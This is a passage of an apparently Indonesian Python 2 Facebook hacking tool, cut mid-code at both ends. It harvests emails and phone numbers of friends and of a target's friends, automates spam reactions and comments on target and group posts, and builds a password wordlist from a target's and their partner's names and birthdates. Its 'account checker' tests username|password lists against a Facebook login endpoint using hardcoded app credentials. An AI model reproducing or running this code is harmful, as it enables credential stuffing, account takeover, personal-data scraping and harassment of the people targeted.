'\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromfriends.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] An error occurred ' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def hpfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromfriends.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def menu_bot(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Bot Reactions Target Post' print '║-> \x1b[1;37;40m2. Bot Reactions Group Post' print '║-> \x1b[1;37;40m3. Bot Comment Target Post' print '║-> \x1b[1;37;40m4. Bot Comment Group Post' print '║-> \x1b[1;37;40m5. Mass Delete Post' print '║-> \x1b[1;37;40m6. Accept Friend Requests' print '║-> \x1b[1;37;40m7. Unfriends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' bot_pilih() def bot_pilih(): bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Can\'t empty' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found' bot_pilih() def menu_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' react_pilih() def react_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' react_pilih() def react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' reactg_pilih() def reactg(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def bot_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def deletepost(): os.system('clear') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...') print 52 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def accept(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) friends = json.loads(r.text) if '[]' in str(friends['data']): print '\x1b[1;91m[!] No friends request' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in friends['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def unfriend(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def lain(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Write Status' print '║-> \x1b[1;37;40m2. Make Wordlist' print '║-> \x1b[1;37;40m3. Account Checker' print '║-> \x1b[1;37;40m4. List Group' print '║-> \x1b[1;37;40m5. Profile Guard' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' pilih_lain() def pilih_lain(): other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Can\'t empty' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found' pilih_lain() def status(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] Can\'t empty' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def wordlist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 52 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def check_akun(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 52 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def grupsaya(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 52 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack 